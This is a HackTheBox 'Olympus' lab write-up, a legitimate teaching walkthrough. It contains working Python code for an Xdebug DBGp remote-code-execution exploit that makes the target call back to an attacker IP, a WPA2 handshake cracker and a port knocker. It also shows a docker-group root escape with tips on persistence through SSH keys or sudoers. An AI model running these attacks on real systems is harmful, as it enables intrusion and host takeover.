HTB Olympus (Medium) - Writeup
Difficulty: Medium
Olympus was a well-designed box involving DNS enumeration (zone transfers) and WPA handshake cracking, with Docker containers playing a key role throughout the journey.
Privilege escalation came down to a misconfiguration (membership of the docker group), making for a solid and enjoyable challenge.
—
Nmap
The nmap scan revealed three open ports and one filtered port:
Port 53 - DNS
We can try to enumerate the zone with dig. The first command requests a full zone transfer (AXFR), the second is a plain lookup of the name:
dig axfr @10.10.10.83 olympus.htb
dig @10.10.10.83 olympus.htb
The domain name olympus.htb was just my guess based on the HTB naming convention. A zone transfer only succeeds for a zone the server is authoritative for and willing to transfer, so a refused AXFR against a guessed name tells us nothing yet.
Port 80 - Website
It doesn’t contain anything interesting, and feroxbuster didn’t find anything either.
Let’s take a look at the HTTP response headers.
Xdebug looks promising, let’s research it a bit.
It turns out that Xdebug is a PHP debugging extension, and 2.5.5 is the version being advertised.
After a quick search I found an RCE exploit for it. The problem is a misconfiguration rather than a bug in Xdebug itself: with xdebug.remote_connect_back enabled, a request carrying the XDEBUG_SESSION_START trigger makes the server open a DBGp debugger connection back to whatever address is in the X-Forwarded-For header, and the DBGp eval command then lets the connected "IDE" run arbitrary PHP in the request’s context.
https://github.com/vulhub/vulhub/blob/master/php/xdebug-rce/exp.py
Let’s try to get basic code execution with it:
python3 exp.py -t http://10.10.10.83/index.php -c 'shell_exec("id");' --dbgp-ip 10.10.14.14
It worked. Now we can try to get shell access; I’ll try a netcat shell first.
We will start a netcat listener on port 9005 and run:
We were lucky: the target’s netcat supported the -e option, which gave us our initial access. Had it not, the same eval primitive could have launched any other PHP-level reverse shell instead.
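To make the mechanism concrete, here is an added Python reimplementation of what exp.py does. This is illustrative code written for this writeup, not the vulhub script and not anything recovered from the box: it sends the trigger request with our IP in X-Forwarded-For, accepts Xdebug’s DBGp connection on port 9000, frames the eval command and parses the length-prefixed XML reply. The addresses, the listening port and the sample engine reply at the bottom are assumptions or constructed data so the parsing path can be exercised offline.

```python
import base64
import socket
import threading
import urllib.request
import xml.etree.ElementTree as ET

DBGP_NS = "{urn:debugger_protocol_v1}"


def trigger_request(target_url: str, attacker_ip: str) -> urllib.request.Request:
    """Request that makes a server with xdebug.remote_connect_back=1 dial back to us.
    XDEBUG_SESSION_START switches debugging on for this request; X-Forwarded-For
    is the address Xdebug trusts as the 'IDE' to connect to."""
    sep = "&" if "?" in target_url else "?"
    return urllib.request.Request(
        target_url + sep + "XDEBUG_SESSION_START=phpstorm",
        headers={"X-Forwarded-For": attacker_ip},
    )


def build_eval_command(php_code: str, txid: int = 1) -> bytes:
    """DBGp client->engine command: 'eval -i <txid> -- <base64(code)>' + NUL."""
    payload = base64.b64encode(php_code.encode()).decode()
    return f"eval -i {txid} -- {payload}\0".encode()


def parse_dbgp_message(buf: bytes):
    """DBGp engine->client framing: ASCII byte length, NUL, XML body, NUL.
    Returns (xml_root, remaining_bytes); xml_root is None while *buf* is incomplete."""
    sep = buf.find(b"\0")
    if sep < 0:
        return None, buf
    length = int(buf[:sep])
    start, end = sep + 1, sep + 1 + length
    if len(buf) < end + 1:              # body or its trailing NUL not received yet
        return None, buf
    return ET.fromstring(buf[start:end]), buf[end + 1:]


def read_message(conn, buf=b""):
    """Block until one complete framed message has arrived on *conn*."""
    while True:
        msg, buf = parse_dbgp_message(buf)
        if msg is not None:
            return msg, buf
        chunk = conn.recv(4096)
        if not chunk:
            raise ConnectionError("Xdebug closed the connection")
        buf += chunk


def eval_result(response) -> str:
    """Extract the string value from a <response command="eval"> message."""
    prop = response.find(f"{DBGP_NS}property")
    if prop is None:
        err = response.find(f"{DBGP_NS}error")
        code = err.get("code", "?") if err is not None else "?"
        raise RuntimeError(f"eval failed, DBGp error code {code}")
    text = prop.text or ""
    if prop.get("encoding") == "base64":
        return base64.b64decode(text).decode(errors="replace")
    return text


def run_attack(target_url, attacker_ip, php_code, port=9000, timeout=10):
    """Full exchange. The PHP request blocks until the debug session ends, so the
    trigger is fired in a background thread while we wait in accept()."""
    with socket.socket() as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind(("0.0.0.0", port))
        srv.listen(1)
        srv.settimeout(timeout)
        req = trigger_request(target_url, attacker_ip)
        threading.Thread(target=urllib.request.urlopen, args=(req,),
                         kwargs={"timeout": timeout}, daemon=True).start()
        conn, _ = srv.accept()
        with conn:
            conn.settimeout(timeout)
            _init, buf = read_message(conn)              # engine speaks first: <init>
            conn.sendall(build_eval_command(php_code))
            resp, _ = read_message(conn, buf)            # <response command="eval">
            return eval_result(resp)


# Constructed engine reply for eval of shell_exec("id"); NOT captured from the box.
SAMPLE_OUTPUT = "uid=33(www-data) gid=33(www-data) groups=33(www-data)\n"
_xml = (
    '<?xml version="1.0" encoding="iso-8859-1"?>'
    '<response xmlns="urn:debugger_protocol_v1" command="eval" transaction_id="1">'
    f'<property type="string" size="{len(SAMPLE_OUTPUT)}" encoding="base64">'
    f'<![CDATA[{base64.b64encode(SAMPLE_OUTPUT.encode()).decode()}]]></property></response>'
).encode("iso-8859-1")
SAMPLE_RESPONSE = str(len(_xml)).encode() + b"\0" + _xml + b"\0"

if __name__ == "__main__":
    # Live use: run_attack("http://10.10.10.83/index.php", "10.10.14.14", 'shell_exec("id");')
    print(eval_result(parse_dbgp_message(SAMPLE_RESPONSE)[0]), end="")
```

The order of operations is the part people get wrong: the HTTP request does not return until Xdebug finishes the debugging session, so the listener must be up and the request must be sent asynchronously before accept() is called.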
After a quick enumeration we see that we are most likely inside a container: the hostname is odd and the IP address differs from the one we scanned.
Python is not installed either, so we can’t upgrade to a full TTY with the usual pty.spawn trick.
Further enumeration turned up a .cap file, which almost certainly contains something interesting.
We will move this file with netcat. First start a listener on Kali:
and then push the file with netcat from the target machine (compare checksums on both sides afterwards, since a truncated capture will silently fail to crack):
Wireshark - .cap Analysis
Now we can open this file with wireshark:
It is a capture of 802.11 traffic, i.e. Wi-Fi frames. What matters is whether it contains a WPA 4-way handshake (EAPOL-Key frames) for the network, because the handshake’s MIC is what a dictionary attack is checked against.
Manually analyzing the file isn’t required here.
We will use aircrack-ng to recover the Wi-Fi passphrase from the handshake:
aircrack-ng file.cap -w /usr/share/wordlists/rockyou.txt
We have found the passphrase “flightoficarus”.
The network name (ESSID) is “Too_cl0se_to_th3_Sun”.
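What aircrack-ng actually does for each wordlist entry is worth seeing once, so here is an added Python example of the WPA2-PSK check. This is my own illustrative code, not aircrack-ng’s and not derived from the box’s capture: derive the PMK with PBKDF2 from passphrase and ESSID, expand it into the PTK, and compare the handshake MIC computed with the resulting KCK against the captured one. The MAC addresses, nonces and EAPOL frame are constructed here; only the ESSID and passphrase are the real ones from the box, and the handshake is assumed to be WPA2/CCMP (key descriptor version 2).

```python
import hashlib
import hmac

MIC_OFFSET = 81   # EAPOL header (4) + Key Descriptor fields preceding the Key MIC (77)
MIC_LEN = 16


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 rounds, 32 bytes).
    This is the expensive step repeated for every wordlist entry."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """IEEE 802.11i PRF-512: PTK = PRF(PMK, "Pairwise key expansion",
    min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce))."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    out = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)                       # 4 x 20 bytes, truncated to 64
    )
    return out[:64]


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """Key MIC for descriptor version 2 (WPA2/CCMP): HMAC-SHA1(KCK, frame with MIC zeroed)[:16].
    Version 1 (TKIP) uses HMAC-MD5 and version 3 uses AES-CMAC; not handled here."""
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * MIC_LEN + eapol[MIC_OFFSET + MIC_LEN:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:MIC_LEN]


def crack_handshake(wordlist, ssid, ap_mac, sta_mac, anonce, snonce, eapol):
    """Dictionary attack: the passphrase whose KCK reproduces the captured MIC wins."""
    captured = eapol[MIC_OFFSET:MIC_OFFSET + MIC_LEN]
    for word in wordlist:
        kck = derive_ptk(derive_pmk(word, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol), captured):
            return word
    return None


def build_msg2(snonce: bytes) -> bytes:
    """Skeleton of EAPOL-Key message 2/4: RSN descriptor, key info 0x010a
    (version 2 | pairwise | MIC), zeroed MIC, empty key data."""
    body = (b"\x02" + b"\x01\x0a" + b"\x00\x10" + 7 * b"\x00" + b"\x01"   # type, info, key len, replay
            + snonce + 16 * b"\x00" + 8 * b"\x00" + 8 * b"\x00"            # nonce, IV, RSC, key ID
            + MIC_LEN * b"\x00" + b"\x00\x00")                              # MIC placeholder, data len
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body               # EAPOL v1, type 3 (Key)


# Constructed handshake: MACs, nonces and frame are made up; the MIC is computed
# here with the box's real passphrase so the cracker has something genuine to match.
SSID = "Too_cl0se_to_th3_Sun"
AP_MAC = bytes.fromhex("020000000001")
STA_MAC = bytes.fromhex("020000000002")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
_frame = build_msg2(SNONCE)
_kck = derive_ptk(derive_pmk("flightoficarus", SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
CAPTURED_EAPOL = _frame[:MIC_OFFSET] + eapol_mic(_kck, _frame) + _frame[MIC_OFFSET + MIC_LEN:]

WORDLIST = ["password", "sunshine", "icarus", "flightoficarus", "daedalus"]  # stand-in for rockyou


def demo():
    return crack_handshake(WORDLIST, SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, CAPTURED_EAPOL)


if __name__ == "__main__":
    print("KEY FOUND:", demo())
```

Two practical consequences follow from the math: the ESSID is the PBKDF2 salt, so a handshake cracked for one network name tells you nothing about the same passphrase on another, and since 4096 HMAC-SHA1 rounds per candidate dominate the cost, a strong passphrase is the only real defence once a handshake has been captured.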
ssh shell as icarus
Combining these two pieces of information, after a few tries we got SSH access as “icarus” with the password “Too_cl0se_to_th3_Sun”.
Notice we specified port 2222, because that is where SSH was listening on this machine.
After some enumeration we found:
Now we need to go back to port 53 enumeration with this new domain name.
Back to port 53 - DNS
With the new domain name we can try the zone transfer again, since port 53 is open.
The zone had a DNS TXT record saying:
"prometheus, open a temporal portal to Hades (3456 8234 62431) and St34l_th3_F1re!"
It looks like a password (“St34l_th3_F1re!”) and three numbers used for port knocking.
Port knocking is a mechanism used to hide network services behind a closed firewall.
Connection attempts to the right sequence of ports, in the right order and within a short time window, make the knock daemon (typically knockd) temporarily open another port for the knocking host.
Nmap reported port 22 as “filtered”, which fits this picture. We can try to knock it open.
The username, “prometheus”, is named at the start of the TXT record and matches the Greek-mythology naming of the other accounts on the box.
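Here is an added Python knocker (example code written for this writeup, not part of the original) that parses the sequence out of the TXT record, sends one TCP SYN per port in order, and then polls whether port 22 has opened. It assumes knockd’s default behaviour of watching TCP SYNs, so a refused connection on each knock port is the expected outcome rather than an error; the target address and the SSH port are assumptions taken from this box.

```python
import re
import socket
import time

TXT_RECORD = '"prometheus, open a temporal portal to Hades (3456 8234 62431) and St34l_th3_F1re!"'


def parse_knock_sequence(txt: str) -> list:
    """Pull the parenthesised run of port numbers out of a TXT record such as
    '(3456 8234 62431)' and validate each one as a TCP port."""
    m = re.search(r"\(([\d\s]+)\)", txt)
    if not m:
        raise ValueError("no knock sequence found in TXT record")
    ports = [int(p) for p in m.group(1).split()]
    bad = [p for p in ports if not 1 <= p <= 65535]
    if bad:
        raise ValueError(f"invalid port(s) in sequence: {bad}")
    return ports


def knock(host: str, ports, timeout: float = 0.5, delay: float = 0.2) -> list:
    """Send one TCP SYN to each port in order (what `nc -z` or `knock` does).
    knockd only needs to see the SYN, so 'closed' or 'filtered' is normal here."""
    results = []
    for port in ports:
        try:
            with socket.create_connection((host, port), timeout=timeout):
                results.append((port, "open"))
        except socket.timeout:
            results.append((port, "filtered"))
        except OSError as e:                 # ECONNREFUSED etc.: the SYN was still sent
            results.append((port, f"closed ({e.strerror})"))
        time.sleep(delay)  # stay well inside knockd's sequence timeout (default 5 s)
    return results


def is_port_open(host: str, port: int, timeout: float = 2.0) -> bool:
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "10.10.10.83"   # assumption: the box
    seq = parse_knock_sequence(TXT_RECORD)
    print("knocking", seq, knock(target, seq))
    for _ in range(5):                        # knockd opens the port asynchronously
        if is_port_open(target, 22):
            print(f"port 22 is open now: ssh prometheus@{target}")
            break
        time.sleep(1)
    else:
        print("port 22 still filtered: re-check order, and whether the daemon wants TCP or UDP knocks")
```

The two things that make knocks fail in practice are sending them too slowly (the sequence timer expires) or with the wrong protocol; knockd sequences can be defined per port as tcp or udp, and nmap cannot tell you which.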
Abusing docker to get root
Again, quick enumeration led to the key finding.
We’re in the “docker” group, which lets us talk to the Docker daemon, and the daemon runs as root on the host: anyone who can start containers can mount and modify the host filesystem.
We can start by listing the images and containers present (docker images, docker ps -a).
There are three of them. I believe we have to use “rodhes”, because this is the only name I haven’t seen elsewhere on this machine.
We can abuse it with this command:
docker run -v /:/mountedroot -i -t rodhes bash
Command Explanation
docker run –> Creates and starts a new container from an image.
-v /:/mountedroot –> Mounts the host’s root filesystem / into the container at the path /mountedroot (read-write by default).
-i –> Keeps STDIN open so the container is interactive.
-t –> Allocates a pseudo-TTY
rodhes –> The name of the Docker image used to create the container.
bash –> The command to run inside the container.
Retrieving a flag
We mounted the host’s / at /mountedroot, so the flag is located at /mountedroot/root/root.txt.
Because the mount is read-write, this is full root on the host rather than just a file read: chroot /mountedroot drops us into the host’s root filesystem, and dropping an SSH key into /mountedroot/root/.ssh/ or adding a sudoers entry would give persistent access.
Thank you for reading!